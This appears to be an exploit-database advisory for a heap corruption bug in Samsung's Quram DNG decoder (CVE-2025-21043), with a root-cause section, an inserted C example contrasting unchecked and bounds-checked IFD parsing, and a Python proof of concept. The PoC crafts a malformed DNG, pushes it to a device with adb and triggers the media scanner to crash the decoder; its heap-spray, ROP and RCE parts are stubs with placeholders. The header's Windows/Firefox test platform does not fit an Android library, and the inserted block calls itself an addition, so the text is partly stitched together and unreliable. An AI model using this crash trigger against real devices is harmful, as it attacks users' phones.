=============================================================================================================================================
| # Title : Samsung QuramDNG Heap Exploitation via Malformed DNG (libimagecodec.quram.so)
| # Author : indoushka
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)
| # Vendor : System built-in component. No standalone download available.
=============================================================================================================================================

[+] Summary :

A vulnerability exists in Samsung's image decoding library (libimagecodec.quram.so), which is responsible for parsing Digital Negative (DNG) images. A malformed DNG whose Image File Directory (IFD) declares more entries than the file actually contains causes heap corruption in the decoder. With precise heap grooming this condition can lead to remote code execution at the moment the malicious DNG is decoded.

[+] Affected Platforms (Likely Impact) :

Devices using the Quram codec and shipping a vulnerable libimagecodec.quram.so, typically:

    Galaxy S22 / S23 / S24 series
    Galaxy Z Fold / Z Flip
    Galaxy A and Tab series
    Any Samsung model using the Quram decoder before SMR-SEP-2025

[+] OS Builds Affected :

Android builds where the Quram codec is present and the security patch level is earlier than September 2025.

[+] Technical Description (Root Cause) :

libimagecodec.quram.so fails to sanitize the size of metadata entries when parsing a DNG file:

    The IFD entry count is read directly from the attacker-controlled file.
    The count is never validated against the number of bytes actually present, so it is used as-is to size the parse/copy of the entry table.
    Heap allocator metadata and adjacent buffers may therefore be overwritten.
    A controlled overwrite can be turned into hijacked control flow.

Critical vulnerable function: doMapPoly16(), located inside the Quram image parsing logic.
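To make the root cause concrete, the following is an added example and not part of the original advisory or of Samsung's code: a toy little-endian TIFF/DNG IFD reader in C that models the unchecked-count pattern described above next to a bounds-checked version, plus a crafter that builds the kind of file the advisory describes (a count field far larger than the entries that follow it). The function names and the MAX_IFD_ENTRIES cap are assumptions for illustration; the real decoder's internals are not on this page. The "unchecked" function only computes how far a naive copy would run past the buffer rather than performing it, so the example itself stays memory-safe.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IFD_ENTRY_SIZE 12u      /* tag(2) type(2) count(4) value/offset(4) */
#define MAX_IFD_ENTRIES 4096u   /* assumed cap; TIFF/DNG define far fewer tags than this */

static uint16_t rd16le(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32le(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Vulnerable pattern (modelled, not executed): the IFD entry count is read straight
 * from the file and multiplied into a copy length without checking it against the
 * bytes actually present. Returns how many bytes such a copy would run past the end
 * of `buf`; 0 means it would have stayed in bounds. */
size_t ifd_copy_overrun_unchecked(const uint8_t *buf, size_t len)
{
    if (len < 10) return 0;
    uint32_t ifd_off = rd32le(buf + 4);
    if ((size_t)ifd_off + 2 > len) return 0;          /* keeps the model itself memory-safe */
    uint16_t count = rd16le(buf + ifd_off);           /* attacker-controlled */
    size_t copy_len = (size_t)count * IFD_ENTRY_SIZE; /* what a naive decoder would copy */
    size_t avail = len - ((size_t)ifd_off + 2);       /* what is actually there */
    return copy_len > avail ? copy_len - avail : 0;
}

/* Hardened version: every value taken from the file is checked against the file
 * size before it is used to size an allocation or a copy. */
int ifd_parse_checked(const uint8_t *buf, size_t len, uint16_t *out_count)
{
    if (len < 8 || memcmp(buf, "II\x2a\x00", 4) != 0) return -1;  /* little-endian TIFF only */
    uint32_t ifd_off = rd32le(buf + 4);
    if (ifd_off < 8 || (size_t)ifd_off + 2 > len) return -2;    /* count field must be inside the file */
    uint16_t count = rd16le(buf + ifd_off);
    if (count == 0 || count > MAX_IFD_ENTRIES) return -3;       /* reject absurd counts outright */
    size_t need = (size_t)count * IFD_ENTRY_SIZE + 4;           /* entries plus next-IFD pointer */
    if (need > len - ((size_t)ifd_off + 2)) return -4;          /* declared entries must fit */
    *out_count = count;
    return 0;
}

/* Constructed test input: 8-byte header, IFD at offset 8 carrying `claimed` in the
 * count field but only one real entry (DNGVersion 0xC612 = 1.4.0.0) and a zero
 * next-IFD pointer. Returns bytes written (26) or 0 if `cap` is too small. */
size_t craft_malformed_dng(uint8_t *out, size_t cap, uint16_t claimed)
{
    static const uint8_t entry[IFD_ENTRY_SIZE] = {
        0x12, 0xC6,             /* tag 0xC612 DNGVersion */
        0x01, 0x00,             /* type 1 = BYTE */
        0x04, 0x00, 0x00, 0x00, /* count 4 */
        0x01, 0x04, 0x00, 0x00  /* value: 1.4.0.0 */
    };
    if (cap < 26) return 0;
    memcpy(out, "II\x2a\x00", 4);
    out[4] = 8; out[5] = 0; out[6] = 0; out[7] = 0;   /* IFD0 at offset 8 */
    out[8] = (uint8_t)(claimed & 0xFF);
    out[9] = (uint8_t)(claimed >> 8);
    memcpy(out + 10, entry, IFD_ENTRY_SIZE);
    memset(out + 22, 0, 4);
    return 26;
}

/* Convenience wrappers so both readers can be compared on the same crafted file. */
size_t overrun_for_count(uint16_t claimed)
{
    uint8_t f[26];
    size_t n = craft_malformed_dng(f, sizeof f, claimed);
    return ifd_copy_overrun_unchecked(f, n);
}

int checked_result_for_count(uint16_t claimed)
{
    uint8_t f[26];
    uint16_t entries = 0;
    size_t n = craft_malformed_dng(f, sizeof f, claimed);
    return ifd_parse_checked(f, n, &entries);
}

int main(void)
{
    printf("count 0xFFFF: unchecked copy overruns by %zu bytes, checked parser -> %d\n",
           overrun_for_count(0xFFFF), checked_result_for_count(0xFFFF));
    printf("count 2:      unchecked copy overruns by %zu bytes, checked parser -> %d\n",
           overrun_for_count(2), checked_result_for_count(2));
    printf("count 1:      unchecked copy overruns by %zu bytes, checked parser -> %d\n",
           overrun_for_count(1), checked_result_for_count(1));
    return 0;
}
```

With a claimed count of 0xFFFF the naive reader would copy 65535 * 12 bytes out of a 26-byte file, which is the oversized-entry condition the advisory describes; the checked reader rejects it on the cap, and rejects a count of 2 on the fit check even though 2 is a perfectly plausible number of tags. Both checks are needed: the cap alone would still let a count that is "small but larger than the file" through.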
Instructions For Saving:
------------------------

1) Save file as: poc.py

Instructions For Running:
-------------------------

python3 poc.py

[+] POC :

import struct
import subprocess
import tempfile
import time

# Device-side path the crafted file is pushed to and then handed to the media scanner.
DEVICE_PATH = "/data/local/tmp/exploit.dng"


def create_malicious_dng(claimed_entries=0xFFFF):
    """Build a minimal little-endian TIFF/DNG whose IFD entry count is far larger
    than the number of entries actually present (the condition described above).
    Only one real entry (DNGVersion) follows the count field; the rest is absent."""
    header = b"II" + struct.pack("<HI", 42, 8)                      # magic, 42, offset of IFD0
    ifd_count = struct.pack("<H", claimed_entries)                  # attacker-controlled count
    dng_version = struct.pack("<HHI4s", 0xC612, 1, 4, b"\x01\x04\x00\x00")
    next_ifd = struct.pack("<I", 0)
    return header + ifd_count + dng_version + next_ifd


class QuramDngExploit:
    def __init__(self):
        self.malicious_dng = None

    def craft_exploit(self):
        """Create the DNG with the oversized IFD entry count."""
        print("[*] Crafting malicious DNG file...")
        self.malicious_dng = create_malicious_dng()
        return self.malicious_dng

    def spray_heap(self):
        """Heap-spray helper. Left as Java source for an app-side groomer; it is not
        compiled or executed by this script and is kept here for reference only."""
        spray_code = """
import java.util.ArrayList;

public class HeapSpray {
    private static ArrayList<byte[]> sprayList = new ArrayList<>();

    public static void spray(int count, int size) {
        for (int i = 0; i < count; i++) {
            byte[] buffer = new byte[size];
            for (int j = 0; j < size; j += 8) {
                buffer[j] = (byte) 0x41;
            }
            sprayList.add(buffer);
        }
    }
}
"""
        return spray_code

    def trigger(self):
        """Push the crafted file to the device and ask the media scanner to index it,
        which routes it through the Quram decoder in com.samsung.ipservice."""
        print("[*] Triggering vulnerability...")
        data = self.malicious_dng or self.craft_exploit()
        # Write locally first; the device path cannot be opened from the host.
        with tempfile.NamedTemporaryFile(suffix=".dng", delete=False) as f:
            f.write(data)
            local_path = f.name
        subprocess.run(["adb", "push", local_path, DEVICE_PATH], check=True)
        subprocess.run([
            "adb", "shell", "am", "broadcast",
            "-a", "android.intent.action.MEDIA_SCANNER_SCAN_FILE",
            "-d", f"file://{DEVICE_PATH}",
        ], check=True)
        print("[*] Waiting for com.samsung.ipservice to process file...")
        time.sleep(10)
        return self.monitor_logcat()

    def monitor_logcat(self):
        """Dump the buffered crash (DEBUG) tag once and look for a native crash in the
        decoder. Uses 'logcat -d' so the script terminates even when nothing crashes."""
        print("[*] Monitoring logcat for crashes...")
        result = subprocess.run(
            ["adb", "logcat", "-d", "-s", "DEBUG"],
            capture_output=True, text=True, errors="ignore",
        )
        for line in result.stdout.splitlines():
            if "SIGSEGV" in line or "libimagecodec.quram" in line:
                print("[+] Crash detected!")
                print(line)
                return True
        print("[-] No crash observed in logcat")
        return False

    def build_rop_chain(self):
        """Build a ROP chain for ARM64. Gadget addresses are placeholders and must be
        resolved against the target's libimagecodec.quram.so build."""
        gadgets = {
            'pop_x0': 0x123456,  # placeholder
            'pop_x1': 0x123457,  # placeholder
            'system': 0x123458,  # placeholder
            'blr_x19': 0x123459,  # placeholder
        }
        rop_chain = []
        return rop_chain

    def achieve_rce(self):
        """Attempt to achieve Remote Code Execution. Not implemented: the shellcode
        below is a placeholder and no payload is delivered."""
        print("[*] Attempting to achieve RCE...")
        shellcode = b"\x00\x00\x00\x00"  # placeholder
        return False


if __name__ == "__main__":
    exploit = QuramDngExploit()
    print("[*] Starting QuramDng exploit (CVE-2025-21043)")
    print("[*] Target: libimagecodec.quram.so")
    print("[*] Vulnerability: OOB Write in doMapPoly16")
    exploit.craft_exploit()
    exploit.trigger()
    print("[*] Exploit completed")

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================